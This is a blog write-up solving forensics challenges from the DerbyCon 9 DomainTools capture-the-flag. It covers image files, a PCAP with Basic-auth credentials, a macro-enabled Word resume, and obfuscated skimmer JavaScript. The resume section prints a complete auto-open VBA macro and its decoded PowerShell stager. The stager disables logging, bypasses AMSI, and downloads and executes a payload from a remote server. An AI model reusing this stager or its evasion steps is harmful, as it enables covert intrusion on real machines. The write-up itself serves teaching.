DerbyCon 9 – DomainTools CTF – Forensics

Part two of the DerbyCon DomainTools CTF write-ups.  You can find yesterday’s coverage of all the Crypto challenges here.  I’ll be contributing solutions for every challenge in the CTF, broken up by the same section names that they used.  When possible, I’ll also be creating CyberChef recipes to directly solve each challenge, and linking to them following the solution description.  Today: the forensics challenges!

Challenge: Doggo Secrets (10 Points)

Directions: Can you extract the secret flag from this file?

File: oh_hi

Solution:

First, unzip…

user@system:~$ unzip oh_hi.zip
Archive: oh_hi.zip
inflating: oh_hi.gpj
creating: __MACOSX/
inflating: __MACOSX/._oh_hi.gpj

So only one file, with an extension of ‘gpj’.  That kind of looks like jpg backwards…

user@system:~$ file oh_hi.gpj
oh_hi.gpj: JPEG image data, JFIF standard 1.01, aspect ratio, density 216x216, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5, orientation=upper-left, xresolution=74, yresolution=82, resolutionunit=2], baseline, precision 8, 1125x1036, components 3

Probably because it is!  Let’s fix that to make it easier for common tools.

user@system:~$ mv oh_hi.gpj oh_hi.jpg

So what is in this JPG?

user@system:~$ eog oh_hi.jpg

Written on the image is the flag:

DT_CTF_123!@#

Challenge: Noise To Signal (20 Points)

Directions: Can you find the flag inside this noisy file?

File: blah (Note: zipped here but originally just raw text)

Solution:  Just look through the file until you find the answer, or use an online tools to break things up for easier analysis (e.g. https://www.online-utility.org/text/analyzer.jsp)

phisheye

Challenge: Sweet logo, dude! (20 Points)

Directions: Find the flag in the DomainTools logo!

File: logo (Note: zipped here but originally just the JPG)

Solution:  Anytime I’m dealing with a challenge like this I like to just binwalk and see if there’s anything weird from a file perspective, so I give that a try before going after other steganographic options:

user@system:~$ binwalk -z logo.jpg

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
30 0x1E TIFF image data, little-endian offset of first image directory: 8
26769 0x6891 Zip archive data, at least v1.0 to extract, compressed size: 16, uncompressed size: 16, name: hmmm.txt
26929 0x6931 End of Zip archive, footer length: 22

Okay, so we have a Zip file added to the end of the JPG… pretty common technique since both can coexist without causing each other any trouble.  I could use ‘dd’ and the offset to get exactly the ZIP archive only, but since neither impacts the other it’s easier to just rename the file to have a ‘.zip’ extension and treat it like a plain archive:

user@system:~$ mv logo.jpg logo.zip
user@system:~$ unzip logo.zip
Archive: logo.zip
warning [logo.zip]: 26769 extra bytes at beginning or within zipfile
(attempting to process anyway)
extracting: hmmm.txt

So, what’s in our ‘hmmm.txt’ file?

user@system:~$ cat hmmm.txt
FKWcp1W1oTImZGVm

After trying to submit that value and getting told ‘no’ it’s time to see what other trickery may be present.  The next obvious thing to try is to Base64 decode it, but that also brings no joy.

After messing around for some time with possible permutations, I finally tried ROT13 then Base64 decode (CyberChef recipe), which gives the answer:

IrisRules123

Challenge: Hack the Hacker (25 Points)

Directions:  Your incident response team notifies you that a user on your network appears to be flooding an internal web server with authentication attempts.

They’ve taken a PCAP to give to you for your investigation. Determine if the insider threat successfully accessed the web server.

The flag is the correct password!

File: insider.pcapng

Solution:

After unzipping and finding the single file (insider.pcapng), open it up with Wireshark.  We find a ton of noise and traffic, everything from Mozilla updates to standard Internet browsing.  We were told that it was an internal web server though, so using the conversation filter we can see that the most likely candidate based on volume of traffic (it is a brute force, after all) is ‘192.168.152.135’.  On the not-very-realistic front, the attempts are coming from that same address, so our purported hacker is rather inept if they’re brute forcing to get admin on a system they’re already on.

As we look at those communications we can see that the attempts are being made with Basic authentication over HTTP… and now we have everything we need to build a filter to get rid of that excess noise:

ip.src==192.168.152.135 && ip.dst==192.168.152.135 && http

That leaves a LOT of answers left… so let’s search for a 200 OK response which would follow a successful login instead of a 401 unauthorized response. We find the first one at packet 176513… and if you’re wondering how to find it quickly, just sort on the Content (Info) field and look for when the value changes from ‘GET / HTTP/1.1’ to ‘HTTP/1.0 401 Unauthorized’ and you’ll see it in between the two. 🙂

We can then just follow that HTTP stream (right click on packet –> Follow –> HTTP Stream) and see that the authentication attempt that was accepted had this header:

Authorization: Basic emVyb2Nvb2w6aGFja2Vy

Basic authorization is just Base64, so…

user@system:~$ echo "emVyb2Nvb2w6aGFja2Vy" | base64 -d
zerocool:hacker

The format of Basic authentication is “username:password” so our answer is:

hacker

Challenge: Hire the Hacker (30 Points)

Directions: You’ve come across a resume for a solid pentester you’re hiring for. The flag is the domain!

File: DadeResume (Note: zipped here but originally just .docm file)

Solution:  Modern (e.g. later than 2007) Word documents are just Zip files, so to start let’s rename this, unzip it, and see what’s inside:

user@system:~$ mv DadeResume.docm DadeResume.zip
user@system:~$ mkdir Dade
user@system:~$ cd Dade/
user@system:~/Dade$ mv ../DadeResume.zip .
user@system:~/Dade$ unzip DadeResume.zip
Archive: DadeResume.zip
inflating: [Content_Types].xml
inflating: _rels/.rels
inflating: word/_rels/document.xml.rels
inflating: word/document.xml
inflating: word/footnotes.xml
inflating: word/header1.xml
inflating: word/footer1.xml
{...}

This is a .docm file, which means embedded macros, so let’s check out the standard location for those: in the ‘word’ directory.  We find some VisualBasic in the default name of ‘vbaProject.bin’.

Unfortunately, viewing the vbaProject.bin file isn’t exactly easy, because they’re an OLE file… but on the plus side there’s a helper Python library and tools for that (when isn’t there?)!

user@system:~/Dade/word$ sudo pip install -U oletools
[sudo] password for user:
The directory '/home/user/.cache/pip/http' or its parent directory is not owned by the current user and the cache has been disabled. Please check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
The directory '/home/user/.cache/pip' or its parent directory is not owned by the current user and caching wheels has been disabled. check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
Collecting oletools
Downloading https://files.pythonhosted.org/packages/6a/f4/33710cf46f4b3dd9fecbf22cebf744a61d65ce653b458e50134010473271/oletools-0.54.2.zip (3.1MB)
100% |████████████████████████████████| 3.1MB 547kB/s
Collecting colorclass (from oletools)
Downloading https://files.pythonhosted.org/packages/37/ea/ae8dbb956939d4392e6a7fdef87fda273854da1128edae016c4104240be8/colorclass-2.2.0.tar.gz
Collecting easygui (from oletools)
Downloading https://files.pythonhosted.org/packages/89/b5/fd22bb3eb36085aeb7781670bbc59cf8b641b1774f77578ec06368865aa3/easygui-0.98.1-py2.py3-none-any.whl (90kB)
100% |████████████████████████████████| 92kB 3.6MB/s
Collecting msoffcrypto-tool (from oletools)
Downloading https://files.pythonhosted.org/packages/c5/68/58628967bc5328b22706c74081df4564e853ee68f4dafd6d77e329ae56e8/msoffcrypto-tool-4.10.1.tar.gz (209kB)
100% |████████████████████████████████| 215kB 442kB/s
Collecting olefile>=0.46 (from oletools)
Downloading https://files.pythonhosted.org/packages/34/81/e1ac43c6b45b4c5f8d9352396a14144bba52c8fec72a80f425f6a4d653ad/olefile-0.46.zip (112kB)
100% |████████████████████████████████| 112kB 3.3MB/s
Collecting pyparsing>=2.2.0 (from oletools)
Downloading https://files.pythonhosted.org/packages/11/fa/0160cd525c62d7abd076a070ff02b2b94de589f1a9789774f17d7c54058e/pyparsing-2.4.2-py2.py3-none-any.whl (65kB)
100% |████████████████████████████████| 71kB 8.7MB/s
Requirement already satisfied, skipping upgrade: cryptography>=2.3 in /usr/lib/python2.7/dist-packages (from msoffcrypto-tool->oletools) (2.3)
Installing collected packages: colorclass, easygui, olefile, msoffcrypto-tool, pyparsing, oletools
Running setup.py install for colorclass ... done
Running setup.py install for olefile ... done
Running setup.py install for msoffcrypto-tool ... done
Running setup.py install for oletools ... done
Successfully installed colorclass-2.2.0 easygui-0.98.1 msoffcrypto-tool-4.10.1 olefile-0.46 oletools-0.54.2 pyparsing-2.4.2

Now let’s dump that code!

user@system:~/Dade/word$ olevba vbaProject.bin
olevba 0.54.2 on Python 2.7.16 - http://decalage.info/python/oletools
===============================================================================
FILE: vbaProject.bin
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: vbaProject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO NewMacros.bas
in file: vbaProject.bin - OLE stream: u'VBA/NewMacros'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub Auto_Open()
odK
End Sub

Sub AutoOpen()
odK
End Sub

Sub Document_Open()
odK
End Sub

Public Function odK() As Variant
Dim cxn As String
cxn = "powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVg"
cxn = cxn + "BlAHIAUwBpAE8AbgBUAGEAYgBsAEUALgBQAFMAVgBFAFIAcwBp"
cxn = cxn + "AG8AbgAuAE0AQQBqAG8AUgAgAC0ARwBlACAAMwApAHsAJABkAD"
cxn = cxn + "MAOQA4ADIAPQBbAFIAZQBGAF0ALgBBAFMAcwBlAG0AQgBsAHkA"
cxn = cxn + "LgBHAEUAVABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQ"
cxn = cxn + "BuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBu"
cxn = cxn + "AC4AVQB0AGkAbABzACcAKQAuACIARwBlAHQARgBpAGUAYABsAG"
cxn = cxn + "QAIgAoACcAYwBhAGMAaABlAGQARwByAG8AdQBwAFAAbwBsAGkA"
cxn = cxn + "YwB5AFMAZQB0AHQAaQBuAGcAcwAnACwAJwBOACcAKwAnAG8Abg"
cxn = cxn + "BQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEkARgAo"
cxn = cxn + "ACQARAAzADkAOAAyACkAewAkADkARQA1AGEAYgA9ACQARAAzAD"
cxn = cxn + "kAOAAyAC4ARwBFAHQAVgBBAGwAVQBlACgAJABuAFUAbABsACkA"
cxn = cxn + "OwBJAEYAKAAkADkARQA1AGEAQgBbACcAUwBjAHIAaQBwAHQAQg"
cxn = cxn + "AnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACkAewAk"
cxn = cxn + "ADkARQA1AEEAQgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG"
cxn = cxn + "8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwA"
cxn = cxn + "ZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZw"
cxn = cxn + "BpAG4AZwAnAF0APQAwADsAJAA5AGUANQBBAGIAWwAnAFMAYwBy"
cxn = cxn + "AGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnAC"
cxn = cxn + "cAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8A"
cxn = cxn + "YwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZw"
cxn = cxn + "AnAF0APQAwAH0AJAB2AEEATAA9AFsAQwBvAEwAbABlAEMAVABJ"
cxn = cxn + "AG8AbgBzAC4ARwBFAG4AZQBSAGkAQwAuAEQAaQBDAHQASQBvAE"
cxn = cxn + "4AQQByAFkAWwBzAFQAcgBJAE4AZwAsAFMAeQBTAHQARQBtAC4A"
cxn = cxn + "TwBCAEoARQBDAHQAXQBdADoAOgBuAEUAVwAoACkAOwAkAHYAQQ"
cxn = cxn + "BMAC4AQQBEAGQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0"
cxn = cxn + "AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcALAAwAC"
cxn = cxn + "kAOwAkAFYAQQBsAC4AQQBEAEQAKAAnAEUAbgBhAGIAbABlAFMA"
cxn = cxn + "YwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbw"
cxn = cxn + "BuAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAOQBFADUAQQBi"
cxn = cxn + "AFsAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE"
cxn = cxn + "4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUA"
cxn = cxn + "cwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcw"
cxn = cxn + "BcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXABTAGMAcgBpAHAAdABC"
cxn = cxn + "ACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAkAF"
cxn = cxn + "YAQQBsAH0ARQBsAHMAZQB7AFsAUwBjAHIASQBQAHQAQgBMAE8A"
cxn = cxn + "YwBrAF0ALgAiAEcARQBUAEYASQBlAGAAbABEACIAKAAnAHMAaQ"
cxn = cxn + "BnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1"
cxn = cxn + "AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAG"
cxn = cxn + "EAbABVAEUAKAAkAG4AdQBsAGwALAAoAE4ARQBXAC0ATwBCAEoA"
cxn = cxn + "ZQBDAFQAIABDAG8ATABMAGUAQwBUAGkATwBOAFMALgBHAGUATg"
cxn = cxn + "BFAFIASQBjAC4ASABBAHMASABTAGUAVABbAFMAdAByAEkATgBH"
cxn = cxn + "AF0AKQApAH0AJABSAGUARgA9AFsAUgBFAGYAXQAuAEEAcwBzAG"
cxn = cxn + "UATQBiAEwAeQAuAEcAZQB0AFQAWQBQAEUAKAAnAFMAeQBzAHQA"
cxn = cxn + "ZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQ"
cxn = cxn + "BhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAk"
cxn = cxn + "AFIAZQBGAC4ARwBFAHQARgBJAGUATABEACgAJwBhAG0AcwBpAE"
cxn = cxn + "kAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIA"
cxn = cxn + "bABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAdABWAEEAbA"
cxn = cxn + "BVAGUAKAAkAE4AVQBsAEwALAAkAFQAUgB1AGUAKQA7AH0AOwBb"
cxn = cxn + "AFMAWQBzAHQARQBtAC4ATgBFAHQALgBTAEUAUgB2AGkAYwBFAF"
cxn = cxn + "AATwBpAG4AVABNAGEATgBBAEcAZQByAF0AOgA6AEUAWABQAGUA"
cxn = cxn + "QwB0ADEAMAAwAEMAbwBuAHQAaQBOAHUARQA9ADAAOwAkADMAOA"
cxn = cxn + "A3AGEAMQA9AE4ARQB3AC0ATwBiAEoARQBjAHQAIABTAFkAcwBU"
cxn = cxn + "AEUAbQAuAE4AZQBUAC4AVwBlAGIAQwBsAGkAZQBOAFQAOwAkAH"
cxn = cxn + "UAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4A"
cxn = cxn + "ZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOw"
cxn = cxn + "AgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAx"
cxn = cxn + "AC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJAAzAD"
cxn = cxn + "gANwBhADEALgBIAGUAQQBEAGUAcgBzAC4AQQBkAEQAKAAnAFUA"
cxn = cxn + "cwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAAzADgANw"
cxn = cxn + "BBADEALgBIAGUAQQBEAEUAcgBTAC4AQQBEAEQAKAAnAFUAcwBl"
cxn = cxn + "AHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAAzADgANwBhAD"
cxn = cxn + "EALgBQAHIATwB4AFkAPQBbAFMAWQBzAFQARQBNAC4ATgBFAFQA"
cxn = cxn + "LgBXAEUAYgBSAEUAUQB1AGUAUwB0AF0AOgA6AEQAZQBGAEEAVQ"
cxn = cxn + "BMAHQAVwBlAGIAUAByAG8AeAB5ADsAJAAzADgANwBhADEALgBQ"
cxn = cxn + "AFIAbwBYAHkALgBDAHIARQBEAEUATgBUAEkAQQBMAHMAIAA9AC"
cxn = cxn + "AAWwBTAHkAcwBUAGUATQAuAE4ARQB0AC4AQwByAGUARABlAE4A"
cxn = cxn + "dABpAEEATABDAEEAYwBIAEUAXQA6ADoARABlAEYAYQB1AGwAdA"
cxn = cxn + "BOAEUAVABXAE8AcgBrAEMAUgBFAEQAZQBuAHQAaQBhAGwAUwA7"
cxn = cxn + "ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAAzAD"
cxn = cxn + "gANwBhADEALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAWQBzAFQA"
cxn = cxn + "RQBNAC4AVABFAFgAdAAuAEUAbgBjAG8ARABJAE4AZwBdADoAOg"
cxn = cxn + "BBAFMAQwBJAEkALgBHAEUAdABCAFkAdABlAFMAKAAnAG0AfQBx"
cxn = cxn + "AG4AWwBPADoAQwB4AD8AMwBBAGkAbAAvAGMAegAxAGIAOABmAH"
cxn = cxn + "AAKwB3ADIAZwBzAHsAWABdAFEATAAnACkAOwAkAFIAPQB7ACQA"
cxn = cxn + "RAAsACQASwA9ACQAQQByAEcAcwA7ACQAUwA9ADAALgAuADIANQ"
cxn = cxn + "A1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAk"
cxn = cxn + "AFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AE"
cxn = cxn + "4AVABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsA"
cxn = cxn + "JABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOw"
cxn = cxn + "AkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7"
cxn = cxn + "ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2AD"
cxn = cxn + "sAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQA"
cxn = cxn + "SABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAFgATwBSACQAUw"
cxn = cxn + "BbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1"
cxn = cxn + "ADYAXQB9AH0AOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAE"
cxn = cxn + "UAbgBjAG8AZABJAG4ARwBdADoAOgBVAG4ASQBDAG8AZABFAC4A"
cxn = cxn + "RwBFAFQAUwBUAHIASQBOAEcAKABbAEMATwBuAHYAZQByAFQAXQ"
cxn = cxn + "A6ADoARgBSAG8ATQBCAEEAcwBFADYANABTAFQAUgBpAE4ARwAo"
cxn = cxn + "ACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAH"
cxn = cxn + "cAQgB6AEEASABVAEEAYwBBAEIAbABBAEgASQBBAGMAdwBCAGwA"
cxn = cxn + "QQBHAHMAQQBjAGcAQgBsAEEASABRAEEAWgBBAEIAdgBBAEcAMA"
cxn = cxn + "BBAFkAUQBCAHAAQQBHADQAQQBMAGcAQgB1AEEARwBVAEEAZABB"
cxn = cxn + "AEEANgBBAEQAWQBBAE4AZwBBADIAQQBEAFkAQQAnACkAKQApAD"
cxn = cxn + "sAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAAzADgA"
cxn = cxn + "NwBBADEALgBIAGUAQQBEAEUAUgBzAC4AQQBEAEQAKAAiAEMAbw"
cxn = cxn + "BvAGsAaQBlACIALAAiAHEAQgBuAEkAcABvAFUAagBlAFkAQQBy"
cxn = cxn + "AHgAWABIAHAAPQBVAFEAWABoADQAcQBxAGwAUgByAGYAYwB3AE"
cxn = cxn + "IAOABEAEkAVwBkAHYAdAA4AGUAdwAzAEoAQQA9ACIAKQA7ACQA"
cxn = cxn + "RABBAHQAYQA9ACQAMwA4ADcAYQAxAC4ARABPAFcAbgBsAE8AYQ"
cxn = cxn + "BEAEQAYQBUAEEAKAAkAHMAZQByACsAJABUACkAOwAkAEkAVgA9"
cxn = cxn + "ACQARABhAFQAQQBbADAALgAuADMAXQA7ACQARABhAFQAQQA9AC"
cxn = cxn + "QARABhAFQAYQBbADQALgAuACQAZABhAHQAYQAuAEwAZQBuAGcA"
cxn = cxn + "VABoAF0AOwAtAEoATwBJAE4AWwBDAGgAQQBSAFsAXQBdACgAJg"
cxn = cxn + "AgACQAUgAgACQARABBAFQAYQAgACgAJABJAFYAKwAkAEsAKQAp"
cxn = cxn + "AHwASQBFAFgA"
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create cxn, Null, objConfig, intProcessID
End Function
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |AutoOpen |Runs when the Word document is opened |
|AutoExec |Document_Open |Runs when the Word or Publisher document is |
| | |opened |
|AutoExec |Auto_Open |Runs when the Excel Workbook is opened |
|Suspicious|powershell |May run PowerShell commands |
|Suspicious|ShowWindow |May hide the application |
|Suspicious|Hex Strings |Hex-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|Suspicious|Dridex Strings |Dridex-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
+----------+--------------------+---------------------------------------------+

WARNING msoffcrypto failed to interpret file vbaProject.bin or determine whether it is encrypted: Unrecognized file format

So we can see some embedded PowerShell code as well… and it’s Base64 encoded.  Presumably that’s what we care about, so let’s examine it.  First we’ll copy and paste all of these lines into a new file (e.g. pshell.txt):

cxn = cxn + "____________

Then we’ll use a bit of sed-ery to clean up the concatenation stuff (the first ‘sed’ command removes the concatenation and variable bits at the start of each line, and the second one removes the trailing double quotes):

user@system:~$ sed -e 's| cxn = cxn + "||' pshell.txt | sed -e 's|"$||' > cleanps.txt

Add then we’ll add the missing bit from the first statement (‘SQBmACgAJABQAFMAVg’) to the start of the file.  Finally, we’ll clean up the line breaks with ‘tr’ and pipe that to a base64 decode:

user@system:~$ cat cleanps.txt | tr -d '\n' | base64 -d
If($PSVerSiOnTablE.PSVERsion.MAjoR -Ge 3){$d3982=[ReF].ASsemBly.GETType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($D3982){$9E5ab=$D3982.GEtVAlUe($nUll);IF($9E5aB['ScriptB'+'lockLogging']){$9E5AB['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$9e5Ab['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vAL=[CoLleCTIons.GEneRiC.DiCtIoNArY[sTrINg,SyStEm.OBJECt]]::nEW();$vAL.ADd('EnableScriptB'+'lockLogging',0);$VAl.ADD('EnableScriptBlockInvocationLogging',0);$9E5Ab['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VAl}Else{[ScrIPtBLOck]."GETFIe`lD"('signatures','N'+'onPublic,Static').SETValUE($null,(NEW-OBJeCT CoLLeCTiONS.GeNERIc.HAsHSeT[StrING]))}$ReF=[REf].AsseMbLy.GetTYPE('System.Management.Automation.AmsiUtils');$ReF.GEtFIeLD('amsiInitFailed','NonPublic,Static').SEtVAlUe($NUlL,$TRue);};[SYstEm.NEt.SERvicEPOinTMaNAGer]::EXPeCt100ContiNuE=0;$387a1=NEw-ObJEct SYsTEm.NeT.WebClieNT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$387a1.HeADers.AdD('User-Agent',$u);$387A1.HeADErS.ADD('User-Agent',$u);$387a1.PrOxY=[SYsTEM.NET.WEbREQueSt]::DeFAULtWebProxy;$387a1.PRoXy.CrEDENTIALs = [SysTeM.NEt.CreDeNtiALCAcHE]::DeFaultNETWOrkCREDentialS;$Script:Proxy = $387a1.Proxy;$K=[SYsTEM.TEXt.EncoDINg]::ASCII.GEtBYteS('m}qn[O:Cx?3Ail/cz1b8fp+w2gs{X]QL');$R={$D,$K=$ArGs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CouNT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXOR$S[($S[$I]+$S[$H])%256]}};$ser=$([Text.EncodInG]::UnICodE.GETSTrING([COnverT]::FRoMBAsE64STRiNG('aAB0AHQAcAA6AC8ALwBzAHUAcABlAHIAcwBlAGsAcgBlAHQAZABvAG0AYQBpAG4ALgBuAGUAdAA6ADYANgA2ADYA')));$t='/news.php';$387A1.HeADERs.ADD("Cookie","qBnIpoUjeYArxXHp=UQXh4qqlRrfcwB8DIWdvt8ew3JA=");$DAta=$387a1.DOWnlOaDDaTA($ser+$T);$IV=$DaTA[0..3];$DaTA=$DaTa[4..$data.LengTh];-JOIN[ChAR[]](& $R $DATa ($IV+$K))|IEX

Oh joy… more encoding. Let’s check those base64 encodings within it and see.  The first one is ‘aAB0AHQAcAA6AC8ALwBzAHUAcABlAHIAcwBlAGsAcgBlAHQAZABvAG0AYQBpAG4ALgBuAGUAdAA6ADYANgA2ADYA’:

user@system:~$ echo "aAB0AHQAcAA6AC8ALwBzAHUAcABlAHIAcwBlAGsAcgBlAHQAZABvAG0AYQBpAG4ALgBuAGUAdAA6ADYANgA2ADYA" | base64 -d
http://supersekretdomain.net:6666

Got it on the first try!  Since all we need is the domain, we’ve got it now!  The answer is:

supersekretdomain.net

Challenge: RIP Your E-Commerce Website (40 Points)

Directions: One of your developers found some weird JavaScript embedded on your companies main e-commerce website. The flag is the URL!

File: hello (Note: zipped here but originally just raw JavaScript)

Solution: There are probably definitely better ways to do this, but in my case I just opened the file and pushed it through a beautifier/deobfuscator (e.g. https://www.jsnice.org). The first entry in the code was “var u=…”, so why not just see what that ends up evaluating to in a disposable browser?

To do that, I first created a new index.html page:

user@system:~$ cat index.html
<html>
<head><title>Be Bad</title>http://hello.js</head>
<body>Boom</body>
</html>

Then I just opened it in Chromium, opened the console (Developer Tools –> Console), and typed the variable name of ‘u’:

u
{snd: null, o7d6e88f271f3ac078a708f7123e10e14: "http://domaintoolsctf.com/checkout/form.js", myid: "1568145254227-607316569", clk: ƒ, send: ƒ}

And we find the URL!

http://domaintoolsctf.com/checkout/form.js

 

[Fin]

Okay, that’s it for the second round… next up is the Reversing section of the DomainTools CTF.  Until next time, good hunting!

One thought on “DerbyCon 9 – DomainTools CTF – Forensics

Add yours

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Powered by WordPress.com.

Up ↑

%d bloggers like this: